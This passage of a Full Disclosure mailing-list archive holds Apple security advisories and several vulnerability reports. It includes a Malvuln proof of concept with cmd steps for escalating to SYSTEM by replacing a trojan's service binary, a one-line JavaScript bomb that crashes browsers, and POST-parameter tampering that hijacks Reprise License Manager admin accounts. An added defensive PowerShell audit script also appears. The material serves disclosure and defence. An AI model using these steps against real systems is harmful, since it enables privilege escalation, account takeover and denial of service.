obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.

To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About
The version after applying this update will be "iOS 16.7.5 and iPadOS 16.7.5".

All information is also posted on the Apple Security Updates
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/securit

[FD] APPLE-SA-01-22-2024-4 iOS 15.8.1 and iPadOS 15.8.1

2024-01-26 Thread Apple Product Security via Fulldisclosure
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

APPLE-SA-01-22-2024-4 iOS 15.8.1 and iPadOS 15.8.1

iOS 15.8.1 and iPadOS 15.8.1 addresses the following issues.
Information about the security content is also available at
https://support.apple.com/kb/HT214062.

Apple maintains a Security Updates page at
https://support.apple.com/HT201222 which lists recent
software updates with security advisories.

WebKit
Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE
(1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch
(7th generation)
Impact: Processing web content may disclose sensitive information. Apple
is aware of a report that this issue may have been exploited against
versions of iOS before iOS 16.7.1.
Description: An out-of-bounds read was addressed with improved input
validation.
WebKit Bugzilla: 265041
CVE-2023-42916: Clément Lecigne of Google's Threat Analysis Group

WebKit
Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE
(1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch
(7th generation)
Impact: Processing web content may lead to arbitrary code execution.
Apple is aware of a report that this issue may have been exploited
against versions of iOS before iOS 16.7.1.
Description: A memory corruption vulnerability was addressed with
improved locking.
WebKit Bugzilla: 265067
CVE-2023-42917: Clément Lecigne of Google's Threat Analysis Group

This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from https://www.apple.com/itunes/  iTunes and Software Update on the
device will automatically check Apple's update server on its weekly
schedule. When an update is detected, it is downloaded and the option
to be installed is presented to the user when the iOS device is
docked. We recommend applying the update immediately if possible.
Selecting Don't Install will present the option the next time you
connect your iOS device.  The automatic update process may take up to
a week depending on the day that iTunes or the device checks for
updates. You may manually obtain the update via the Check for Updates
button within iTunes, or the Software Update on your device.  To
check that the iPhone, iPod touch, or iPad has been updated:  *
Navigate to Settings * Select General * Select About. The version
after applying this update will be "iOS 15.8.1 and iPadOS 15.8.1".
All information is also posted on the Apple Security Updates
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

[FD] APPLE-SA-01-22-2024-5 macOS Sonoma 14.3

2024-01-26 Thread Apple Product Security via Fulldisclosure
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

APPLE-SA-01-22-2024-5 macOS Sonoma 14.3

macOS Sonoma 14.3 addresses the following issues.
Information about the security content is also available at
https://support.apple.com/kb/HT214061.

Apple maintains a Security Updates page at
https://support.apple.com/HT201222 which lists recent
software updates with security advisories.

Apple Neural Engine
Available for: macOS Sonoma
Impact: An app may be able to execute arbitrary code with kernel
privileges
Description: The issue was addressed with improved memory handling.
CVE-2024-23212: Ye Zhang of Baidu Security

CoreCrypto
Available for: macOS Sonoma
Impact: An attacker may be able to decrypt legacy RSA PKCS#1 v1.5
ciphertexts without having the private key
Description: A timing side-channel issue was addressed with improvements
to constant-time computation in cryptographic functions.
CVE-2024-23218: Clemens Lang

Finder
Available for: macOS Sonoma
Impact: An app may be able to access sensitive user data
Description: The issue was addressed with improved checks.
CVE-2024-23224: Brian McNulty

Kernel
Available for: macOS Sonoma
Impact: An app may be able to execute arbitrary code with kernel
privileges
Description: The issue was addressed with improved memory handling.
CVE-2024-23208: fmyy(@binary_fmyy) and lime From TIANGONG Team of
Legendsec at QI-ANXIN Group

LLVM
Available for: macOS Sonoma
Impact: Processing web content may lead to arbitrary code execution
Description: The issue was addressed with improved memory handling.
CVE-2024-23209

Mail Search
Available for: macOS Sonoma
Impact: An app may be able to access sensitive user data
Description: This issue was addressed with improved redaction of
sensitive information.
CVE-2024-23207: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab), and
Ian de Marcellus

NSSpellChecker
Available for: macOS Sonoma
Impact: An app may be able to access sensitive user data
Description: A privacy issue was addressed with improved handling of
files.
CVE-2024-23223: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

Safari
Available for: macOS Sonoma
Impact: A user's private browsing activity may be visible in Settings
Description: A privacy issue was addressed with improved handling of
user preferences.
CVE-2024-23211: Mark Bowers

Shortcuts
Available for: macOS Sonoma
Impact: A shortcut may be able to use sensitive data with certain
actions without prompting the user
Description: The issue was addressed with additional permissions checks.
CVE-2024-23203: an anonymous researcher
CVE-2024-23204: Jubaer Alnazi (@h33tjubaer)

Shortcuts
Available for: macOS Sonoma
Impact: An app may be able to bypass certain Privacy preferences
Description: A privacy issue was addressed with improved handling of
temporary files.
CVE-2024-23217: Kirin (@Pwnrin)

TCC
Available for: macOS Sonoma
Impact: An app may be able to access user-sensitive data
Description: An issue was addressed with improved handling of temporary
files.
CVE-2024-23215: Zhongquan Li (@Guluisacat)

Time Zone
Available for: macOS Sonoma
Impact: An app may be able to view a user's phone number in system logs
Description: This issue was addressed with improved redaction of
sensitive information.
CVE-2024-23210: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

WebKit
Available for: macOS Sonoma
Impact: A maliciously crafted webpage may be able to fingerprint the
user
Description: An access issue was addressed with improved access
restrictions.
WebKit Bugzilla: 262699
CVE-2024-23206: an anonymous researcher

WebKit
Available for: macOS Sonoma
Impact: Processing web content may lead to arbitrary code execution
Description: The issue was addressed with improved memory handling.
WebKit Bugzilla: 266619
CVE-2024-23213: Wangtaiyu of Zhongfu info

WebKit
Available for: macOS Sonoma
Impact: Processing maliciously crafted web content may lead to arbitrary
code execution
Description: Multiple memory corruption issues were addressed with
improved memory handling.
WebKit Bugzilla: 265129
CVE-2024-23214: Nan Wang (@eternalsakura13) of 360 Vulnerability
Research Institute

WebKit
Available for: macOS Sonoma
Impact: Processing maliciously crafted web content may lead to arbitrary
code execution. Apple is aware of a report that this issue may have been
exploited.
Description: A type confusion issue was addressed with improved checks.
WebKit Bugzilla: 267134
CVE-2024-23222

macOS Sonoma 14.3 may be obtained from the Mac App Store or Apple's
Software Downloads web site: https://support.apple.com/downloads/
All information is also posted on the Apple Security Updates
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/

[FD] APPLE-SA-01-22-2024-6 macOS Ventura 13.6.4

2024-01-26 Thread Apple Product Security via Fulldisclosure
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

APPLE-SA-01-22-2024-6 macOS Ventura 13.6.4

macOS Ventura 13.6.4 addresses the following issues.
Information about the security content is also available at
https://support.apple.com/kb/HT214058.

Apple maintains a Security Updates page at
https://support.apple.com/HT201222 which lists recent
software updates with security advisories.

Apple Neural Engine
Available for: macOS Ventura
Impact: An app may be able to execute arbitrary code with kernel
privileges
Description: The issue was addressed with improved memory handling.
CVE-2024-23212: Ye Zhang of Baidu Security

Accessibility
Available for: macOS Ventura
Impact: An app may be able to access sensitive user data
Description: A privacy issue was addressed with improved private data
redaction for log entries.
CVE-2023-42937: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

Core Data
Available for: macOS Ventura
Impact: An app may be able to bypass Privacy preferences
Description: This issue was addressed by removing the vulnerable code.
CVE-2023-40528: Kirin (@Pwnrin) of NorthSea

curl
Available for: macOS Ventura
Impact: Multiple issues in curl
Description: Multiple issues were addressed by updating to curl version
8.4.0.
CVE-2023-38545
CVE-2023-38039
CVE-2023-38546
CVE-2023-42915

Finder
Available for: macOS Ventura
Impact: An app may be able to access sensitive user data
Description: The issue was addressed with improved checks.
CVE-2024-23224: Brian McNulty

ImageIO
Available for: macOS Ventura
Impact: Processing a maliciously crafted image may result in disclosure
of process memory
Description: The issue was addressed with improved checks.
CVE-2023-42888: Michael DePlante (@izobashi) of Trend Micro Zero Day
Initiative

LoginWindow
Available for: macOS Ventura
Impact: A local attacker may be able to view the previous logged in
user’s desktop from the fast user switching screen
Description: An authentication issue was addressed with improved state
management.
CVE-2023-42935

Mail Search
Available for: macOS Ventura
Impact: An app may be able to access sensitive user data
Description: This issue was addressed with improved redaction of
sensitive information.
CVE-2024-23207: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab), and
Ian de Marcellus

NSOpenPanel
Available for: macOS Ventura
Impact: An app may be able to read arbitrary files
Description: An access issue was addressed with additional sandbox
restrictions.
CVE-2023-42887: Ron Masas of BreakPoint.sh

WebKit
Available for: macOS Ventura
Impact: Processing maliciously crafted web content may lead to arbitrary
code execution. Apple is aware of a report that this issue may have been
exploited.
Description: A type confusion issue was addressed with improved checks.
WebKit Bugzilla: 267134
CVE-2024-23222

macOS Ventura 13.6.4 may be obtained from the Mac App Store or
Apple's Software Downloads web site:
https://support.apple.com/downloads/
All information is also posted on the Apple Security Updates
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/

[FD] APPLE-SA-01-22-2024-7 macOS Monterey 12.7.3

2024-01-26 Thread Apple Product Security via Fulldisclosure
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

APPLE-SA-01-22-2024-7 macOS Monterey 12.7.3

macOS Monterey 12.7.3 addresses the following issues.
Information about the security content is also available at
https://support.apple.com/kb/HT214057.

Apple maintains a Security Updates page at
https://support.apple.com/HT201222 which lists recent
software updates with security advisories.

Accessibility
Available for: macOS Monterey
Impact: An app may be able to access sensitive user data
Description: A privacy issue was addressed with improved private data
redaction for log entries.
CVE-2023-42937: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

Apple Neural Engine
Available for: macOS Monterey
Impact: An app may be able to execute arbitrary code with kernel
privileges
Description: The issue was addressed with improved memory handling.
CVE-2024-23212: Ye Zhang of Baidu Security

curl
Available for: macOS Monterey
Impact: Multiple issues in curl
Description: Multiple issues were addressed by updating to curl version
8.4.0.
CVE-2023-38545
CVE-2023-38039
CVE-2023-38546
CVE-2023-42915

ImageIO
Available for: macOS Monterey
Impact: Processing a maliciously crafted image may result in disclosure
of process memory
Description: The issue was addressed with improved checks.
CVE-2023-42888: Michael DePlante (@izobashi) of Trend Micro Zero Day
Initiative

Mail Search
Available for: macOS Monterey
Impact: An app may be able to access sensitive user data
Description: This issue was addressed with improved redaction of
sensitive information.
CVE-2024-23207: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab), and
Ian de Marcellus

WebKit
Available for: macOS Monterey
Impact: Processing maliciously crafted web content may lead to arbitrary
code execution. Apple is aware of a report that this issue may have been
exploited.
Description: A type confusion issue was addressed with improved checks.
WebKit Bugzilla: 267134
CVE-2024-23222

macOS Monterey 12.7.3 may be obtained from the Mac App Store or
Apple's Software Downloads web site:
https://support.apple.com/downloads/
All information is also posted on the Apple Security Updates
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/

[FD] APPLE-SA-01-22-2024-8 watchOS 10.3

2024-01-26 Thread Apple Product Security via Fulldisclosure
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

APPLE-SA-01-22-2024-8 watchOS 10.3

watchOS 10.3 addresses the following issues.
Information about the security content is also available at
https://support.apple.com/kb/HT214060.

Apple maintains a Security Updates page at
https://support.apple.com/HT201222 which lists recent
software updates with security advisories.

Apple Neural Engine
Available for devices with Apple Neural Engine: Apple Watch Series 9 and
Apple Watch Ultra 2
Impact: An app may be able to execute arbitrary code with kernel
privileges
Description: The issue was addressed with improved memory handling.
CVE-2024-23212: Ye Zhang of Baidu Security

CoreCrypto
Available for: Apple Watch Series 4 and later
Impact: An attacker may be able to decrypt legacy RSA PKCS#1 v1.5
ciphertexts without having the private key
Description: A timing side-channel issue was addressed with improvements
to constant-time computation in cryptographic functions.
CVE-2024-23218: Clemens Lang

Kernel
Available for: Apple Watch Series 4 and later
Impact: An app may be able to execute arbitrary code with kernel
privileges
Description: The issue was addressed with improved memory handling.
CVE-2024-23208: fmyy(@binary_fmyy) and lime From TIANGONG Team of
Legendsec at QI-ANXIN Group

Mail Search
Available for: Apple Watch Series 4 and later
Impact: An app may be able to access sensitive user data
Description: This issue was addressed with improved redaction of
sensitive information.
CVE-2024-23207: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab), and
Ian de Marcellus

NSSpellChecker
Available for: Apple Watch Series 4 and later
Impact: An app may be able to access sensitive user data
Description: A privacy issue was addressed with improved handling of
files.
CVE-2024-23223: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

Safari
Available for: Apple Watch Series 4 and later
Impact: A user's private browsing activity may be visible in Settings
Description: A privacy issue was addressed with improved handling of
user preferences.
CVE-2024-23211: Mark Bowers

Shortcuts
Available for: Apple Watch Series 4 and later
Impact: A shortcut may be able to use sensitive data with certain
actions without prompting the user
Description: The issue was addressed with additional permissions checks.
CVE-2024-23204: Jubaer Alnazi (@h33tjubaer)

Shortcuts
Available for: Apple Watch Series 4 and later
Impact: An app may be able to bypass certain Privacy preferences
Description: A privacy issue was addressed with improved handling of
temporary files.
CVE-2024-23217: Kirin (@Pwnrin)

TCC
Available for: Apple Watch Series 4 and later
Impact: An app may be able to access user-sensitive data
Description: An issue was addressed with improved handling of temporary
files.
CVE-2024-23215: Zhongquan Li (@Guluisacat)

Time Zone
Available for: Apple Watch Series 4 and later
Impact: An app may be able to view a user's phone number in system logs
Description: This issue was addressed with improved redaction of
sensitive information.
CVE-2024-23210: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

WebKit
Available for: Apple Watch Series 4 and later
Impact: A maliciously crafted webpage may be able to fingerprint the
user
Description: An access issue was addressed with improved access
restrictions.
WebKit Bugzilla: 262699
CVE-2024-23206: an anonymous researcher

WebKit
Available for: Apple Watch Series 4 and later
Impact: Processing web content may lead to arbitrary code execution
Description: The issue was addressed with improved memory handling.
WebKit Bugzilla: 266619
CVE-2024-23213: Wangtaiyu of Zhongfu info

Instructions on how to update your Apple Watch software are available
at https://support.apple.com/kb/HT204641  To check the version on
your Apple Watch, open the Apple Watch app on your iPhone and select
"My Watch > General > About".  Alternatively, on your watch, select
"My Watch > General > About".
All information is also posted on the Apple Security Updates
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/

[FD] APPLE-SA-01-22-2024-9 tvOS 17.3

2024-01-26 Thread Apple Product Security via Fulldisclosure
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

APPLE-SA-01-22-2024-9 tvOS 17.3

tvOS 17.3 addresses the following issues.
Information about the security content is also available at
https://support.apple.com/kb/HT214055.

Apple maintains a Security Updates page at
https://support.apple.com/HT201222 which lists recent
software updates with security advisories.

Apple Neural Engine
Available for: Apple TV HD and Apple TV 4K (all models)
Impact: An app may be able to execute arbitrary code with kernel
privileges
Description: The issue was addressed with improved memory handling.
CVE-2024-23212: Ye Zhang of Baidu Security

CoreCrypto
Available for: Apple TV HD and Apple TV 4K (all models)
Impact: An attacker may be able to decrypt legacy RSA PKCS#1 v1.5
ciphertexts without having the private key
Description: A timing side-channel issue was addressed with improvements
to constant-time computation in cryptographic functions.
CVE-2024-23218: Clemens Lang

Kernel
Available for: Apple TV HD and Apple TV 4K (all models)
Impact: An app may be able to execute arbitrary code with kernel
privileges
Description: The issue was addressed with improved memory handling.
CVE-2024-23208: fmyy(@binary_fmyy) and lime From TIANGONG Team of
Legendsec at QI-ANXIN Group

NSSpellChecker
Available for: Apple TV HD and Apple TV 4K (all models)
Impact: An app may be able to access sensitive user data
Description: A privacy issue was addressed with improved handling of
files.
CVE-2024-23223: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

TCC
Available for: Apple TV HD and Apple TV 4K (all models)
Impact: An app may be able to access user-sensitive data
Description: An issue was addressed with improved handling of temporary
files.
CVE-2024-23215: Zhongquan Li (@Guluisacat)

Time Zone
Available for: Apple TV HD and Apple TV 4K (all models)
Impact: An app may be able to view a user's phone number in system logs
Description: This issue was addressed with improved redaction of
sensitive information.
CVE-2024-23210: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

WebKit
Available for: Apple TV HD and Apple TV 4K (all models)
Impact: A maliciously crafted webpage may be able to fingerprint the
user
Description: An access issue was addressed with improved access
restrictions.
WebKit Bugzilla: 262699
CVE-2024-23206: an anonymous researcher

WebKit
Available for: Apple TV HD and Apple TV 4K (all models)
Impact: Processing web content may lead to arbitrary code execution
Description: The issue was addressed with improved memory handling.
WebKit Bugzilla: 266619
CVE-2024-23213: Wangtaiyu of Zhongfu info

WebKit
Available for: Apple TV HD and Apple TV 4K (all models)
Impact: Processing maliciously crafted web content may lead to arbitrary
code execution. Apple is aware of a report that this issue may have been
exploited.
Description: A type confusion issue was addressed with improved checks.
WebKit Bugzilla: 267134
CVE-2024-23222

Apple TV will periodically check for software updates. Alternatively,
you may manually check for software updates by selecting "Settings ->
System -> Software Update -> Update Software."  To check the current
version of software, select "Settings -> General -> About."
All information is also posted on the Apple Security Updates
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/

[FD] TrojanSpy Win32 Nivdort / Insecure Permissions - EoP (SYSTEM)

2024-01-26 Thread malvuln
Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024
Original source:
https://malvuln.com/advisory/15bda00b57e2ed729a45f7cfa62165da.txt
Contact: malvul...@gmail.com
Media: twitter.com/malvuln

Threat: TrojanSpy Win32 Nivdort
Vulnerability: Insecure Permissions - EoP (SYSTEM)
Family: Nivdort
Type: PE32
MD5: 15bda00b57e2ed729a45f7cfa62165da
Vuln ID: MVID-2024-0668
Dropped files: dqrpgvnkh, egjrdhynfm, nhefhloix, rvoyf6ljtqg4zejno.exe
Disclosure: 01/20/2024

Description:
The malware creates a service which runs as SYSTEM and grants change (C)
permissions to the authenticated user group on its installation directory.
Standard low integrity users can still rename the service executable while
it is running, replace the PE file with their own and restart the infected
system to start the service.

C:\>cacls C:\pewcvmnvyr\jwgaklb.exe
C:\pewcvmnvyr\jwgaklb.exe BUILTIN\Administrators:(ID)F
  NT AUTHORITY\SYSTEM:(ID)F
  BUILTIN\Users:(ID)R
  NT AUTHORITY\Authenticated Users:(ID)C


C:\>sc qc "Group Key KtmRm Coordinator Registry TPM Bus"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Group Key KtmRm Coordinator Registry TPM Bus
TYPE   : 110  WIN32_OWN_PROCESS (interactive)
START_TYPE : 2   AUTO_START
ERROR_CONTROL  : 0   IGNORE
BINARY_PATH_NAME   : C:\pewcvmnvyr\jwgaklb.exe
LOAD_ORDER_GROUP   :
TAG: 0
DISPLAY_NAME   : Group Key KtmRm Coordinator Registry TPM Bus
DEPENDENCIES   :
SERVICE_START_NAME : LocalSystem


Exploit/PoC:
Open a cmd prompt as standard user:

1) unhide the service binary
   C:\Users\norgt>attrib -s -h \pewcvmnvyr\jwgaklb.exe

2) rename the service binary
C:\Users\norgt>ren \pewcvmnvyr\jwgaklb.exe PWNED

3) optional replace with your own binary and escalate to SYSTEM

C:\Users\norgt>dir \pewcvmnvyr\
 Directory of C:\pewcvmnvyr
..
01/14/2024  02:05 AM 0 dqrpgvnkh
01/14/2024  02:05 AM 6 egjrdhynfm
01/14/2024  02:09 AM 4 nhefhloix
01/14/2024  02:05 AM   332,800 PWNED   <= DONE
01/14/2024  02:05 AM   332,800 rvoyf9njtqg4zejno.exe


Disclaimer: The information contained within this advisory is supplied
"as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author. The author is not responsible for any misuse of the information
contained herein and accepts no responsibility for any damage caused by the
use or misuse of this information. The author prohibits any malicious use
of security related information or exploits by the author or elsewhere. Do
not attempt to download Malware samples. The author of this website takes
no responsibility for any kind of damages occurring from improper Malware
handling or the downloading of ANY Malware mentioned on this website or
elsewhere. All content Copyright (c) Malvuln.com (TM).
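
As an added defender's check (the editor's own example, not part of the Malvuln advisory), the PowerShell below audits every installed service for the condition the advisory documents: a service binary, or the directory it lives in, that grants Change/Modify or broader write rights to Authenticated Users, Users, Everyone or INTERACTIVE. The principal list, the rights mask and the command-line parsing are the editor's assumptions; run it in an elevated PowerShell on the host being checked.

```powershell
# Added example: audit Windows services for binaries that low-privilege
# principals can rename or replace (the weak-ACL pattern shown in the advisory).
# Assumptions (editor's, not from the advisory): the principal list and the
# rights mask below; run elevated so every service path can be inspected.

$WeakPrincipals = @(
    'NT AUTHORITY\Authenticated Users',
    'BUILTIN\Users',
    'Everyone',
    'NT AUTHORITY\INTERACTIVE'
)

# Rights that let a principal replace or rename the file. cacls shows the
# advisory's case as (C), which .NET reports as Modify. Generic rights
# (GENERIC_ALL etc.) are not folded into this mask, so review raw ACLs too.
$WriteMask = [System.Security.AccessControl.FileSystemRights]::Modify -bor
             [System.Security.AccessControl.FileSystemRights]::Write -bor
             [System.Security.AccessControl.FileSystemRights]::Delete -bor
             [System.Security.AccessControl.FileSystemRights]::FullControl -bor
             [System.Security.AccessControl.FileSystemRights]::TakeOwnership -bor
             [System.Security.AccessControl.FileSystemRights]::ChangePermissions

function Get-ServiceBinaryPath {
    param([string]$PathName)
    # PathName may be quoted and may carry arguments: "C:\dir\svc.exe" -arg
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    # Unquoted: take the shortest prefix ending in .exe (-match is case-insensitive)
    if ($PathName -match '^(.+?\.exe)') { return $Matches[1] }
    return ($PathName -split '\s+')[0]
}

function Test-WeakAcl {
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return $null }
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $null }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($WeakPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if (($ace.FileSystemRights -band $WriteMask) -ne 0) {
            return [pscustomobject]@{
                Path      = $Path
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
            }
        }
    }
    return $null
}

Get-CimInstance Win32_Service | ForEach-Object {
    $bin = Get-ServiceBinaryPath $_.PathName
    if (-not $bin) { return }
    # Check the executable and its parent directory: renaming or replacing the
    # file needs write access to the directory, which is what the advisory shows.
    foreach ($target in @($bin, (Split-Path -Parent $bin))) {
        $hit = Test-WeakAcl $target
        if ($hit) {
            [pscustomobject]@{
                Service   = $_.Name
                StartName = $_.StartName   # LocalSystem hits are the high-impact ones
                StartMode = $_.StartMode
                Path      = $hit.Path
                Principal = $hit.Principal
                Rights    = $hit.Rights
            }
        }
    }
} | Format-Table -AutoSize
```

A hit whose StartName is LocalSystem and whose Rights include Modify on the directory is the exact situation in the advisory's `cacls` and `sc qc` output. Remediation on a legitimate service is to tighten the ACL on the directory and binary to Administrators and SYSTEM; a hit on an unknown binary with a randomized name like the one above is an indicator to isolate the host and collect the sample rather than fix in place.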

[FD] Yet another fork()/malloc() bomb in javascript + SIGILL in Chrome

2024-01-26 Thread Georgi Guninski
Searching the web for `javascript fork malloc bomb` returns results,
e.g. [here][1] and [here][2].

We got a javascript fork malloc bomb which crashed Chrome 121 on linux
with SIGILL and about one in five runs the virtual machine freezes.
SIGILL almost always is a sign of memory corruption :)
On android it crashes the current tab without explanation.
Firefox 121 on linux also crashes the current tab.

In all cases except the sporadic freezes, the browser remains functioning,
not counting the crashed tab.

The javascript code is simply simple:

`setInterval("document.body.innerHTML += document.body.innerHTML ",1);`

[Online demo][3], in case someone wants to test it on other browsers
or debug.

The GNU/linux tests took about 1.5 minutes in a virtual machine with
4GB RAM and single core.

[1]: http://wiki.glitchdata.com/index.php/Examples_of_fork_bombs#JavaScript
[2]: https://gist.github.com/betandr/f0cbbb663accc3a76c11cc7661711566#javascript
[3]: https://www.guninski.com/fork1.html

[FD] Multiple Vulnerabilities in Reprise License Manager 15.1 (CVE-2023-43183, CVE-2023-44031)

2024-01-26 Thread Rahim, Mohaiman via Fulldisclosure
Multiple Vulnerabilities in Reprise License Manager 15.1 (CVE-2023-43183, 
CVE-2023-44031)

Credit: Mohaiman Rahim


# Product:  RLM 15.1
# Vendor:   Reprise Software
# CVE ID:   CVE-2023-43183
# Vulnerability Title: Incorrect Access Control (leading to PrivEsc)
# Severity:  High
# Author(s): Mohaiman Rahim
# Date: 2024-01-14
#
#
Introduction:
Reprise License Manager 15.1 is affected by an incorrect access control 
vulnerability which allows low level users, such as read-only users, to 
arbitrarily change the password of an admin and hijack their account.

Vulnerability PoC:

This vulnerability can be demonstrated by modifying the "user" POST parameter 
at http://HOST:5054/change_password_process with the username of a target user 
(such as an Admin account).
When executed this will result in the password of the targeted user being 
changed and the account therefore being compromised.

# Product:  RLM 15.1
# Vendor:   Reprise Software
# CVE ID:   CVE-2023-44031
# Vulnerability Title: Incorrect Access Control (leading to arbitrary file 
write)
# Severity:  High
# Author(s): Mohaiman Rahim
# Date: 2024-01-14
#
#
Introduction:
Reprise License Manager 15.1 is affected by an incorrect access control 
vulnerability which allows a user to perform privileged web application 
functions, such as a function that generates system information.
This vulnerability can be exploited to be able to change the path of where the 
diagnostics file should be saved via a crafted HTTP POST request.
This can allow an attacker to save the diagnostics file, containing system 
information, in insecure locations.

Vulnerability PoC:

This vulnerability can be demonstrated by modifying the "outputfile" POST 
parameter at http://HOST:5054/diagnostics_doit to an insecure path accessible 
by local users such as "C:\temp".

[FD] Null pointer dereference in freedesktop mesa

2024-01-26 Thread Meng Ruijie
[Vulnerability description]
freedesktop Mesa v23.0.4 was discovered to contain a NULL pointer dereference 
via the function dri2GetGlxDrawableFromXDrawableId(). This vulnerability is 
triggered when the X11 server sends a DRI2_BufferSwapComplete event 
unexpectedly when the application is using DRI3.

[VulnerabilityType Other]
null pointer dereference

[Vendor of Product]
freedesktop

[Affected Product Code Base]
Mesa - 23.0.4

[Reference]
https://gitlab.freedesktop.org/mesa/mesa/-/issues/9856

[CVE Reference]
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned 
the name CVE-2023-45913 to this vulnerability.

[FD] Null pointer dereference in Xedit

2024-01-26 Thread Meng Ruijie
[Vulnerability description]
A NULL pointer dereference in the component /X11/xedit/lisp of Xedit v1.2.3 
allows attackers to cause a Denial of Service (DoS) via a crafted lisp.lsp file.

[VulnerabilityType Other]
null pointer dereference

[Vendor of Product]
Xedit

[Affected Product Code Base]
Xedit - 1.2.3

[Reference]
https://gitlab.freedesktop.org/xorg/app/xedit/-/issues/1

[CVE Reference]
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned 
the name CVE-2023-45916 to this vulnerability.

[FD] NULL pointer dereference in tgetstr() of ncurses

2024-01-26 Thread Meng Ruijie
[Vulnerability description]
ncurses v6.4-20230610 was discovered to contain a NULL pointer dereference via 
the function tgetstr().

[VulnerabilityType Other]
null pointer dereference

[Vendor of Product]
ncurses

[Affected Product Code Base]
ncurses - 6.4-20230610

[Reference]
https://lists.gnu.org/archive/html/bug-ncurses/2023-06/msg5.html

[CVE Reference]
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned 
the name CVE-2023-45918 to this vulnerability.


[FD] Buffer Overflow in glXQueryServerString() of mesa

2024-01-26 Thread Meng Ruijie
[Vulnerability description]
freedesktop Mesa v23.0.4 was discovered to contain a segmentation violation via 
the function glXQueryServerString().

[Vulnerability Type]
Buffer Overflow

[Vendor of Product]
freedesktop

[Affected Product Code Base]
Mesa - 23.0.4

[Reference]
https://gitlab.freedesktop.org/mesa/mesa/-/issues/9858

[CVE Reference]
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned 
the name CVE-2023-45919 to this vulnerability.


[FD] Null pointer dereference in XGetWMHints() of Xfig

2024-01-26 Thread Meng Ruijie
[Vulnerability description]
Xfig v3.2.8 was discovered to contain a segmentation violation via the function 
XGetWMHints().

[VulnerabilityType Other]
null pointer dereference

[Vendor of Product]
SourceForge

[Affected Product Code Base]
Xfig - 3.2.8

[Reference]
https://sourceforge.net/p/mcj/tickets/155/

[CVE Reference]
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned 
the name CVE-2023-45920 to this vulnerability.


[FD] NULL pointer dereference in the function handle_viminfo_register() of vim

2024-01-26 Thread Meng Ruijie
[Vulnerability description]
A NULL pointer dereference in the function handle_viminfo_register() of vim 
v9.0 allows attackers to cause a Denial of Service (DoS) via a crafted file.

[VulnerabilityType Other]
null pointer dereference

[Vendor of Product]
vim

[Affected Product Code Base]
vim - 9.0

[Reference]
https://github.com/vim/vim/issues/12652

[CVE Reference]
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned 
the name CVE-2023-45921 to this vulnerability.


[FD] NULL pointer dereference in __glXGetDrawableAttribute() of Mesa

2024-01-26 Thread Meng Ruijie
[Vulnerability description]
freedesktop Mesa v23.0.4 was discovered to contain a NULL pointer dereference 
via the function __glXGetDrawableAttribute().

[Vulnerability Type]
Buffer Overflow

[Vendor of Product]
freedesktop

[Affected Product Code Base]
Mesa - 23.0.4

[Reference]
https://gitlab.freedesktop.org/mesa/mesa/-/issues/9857

[CVE Reference]
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned 
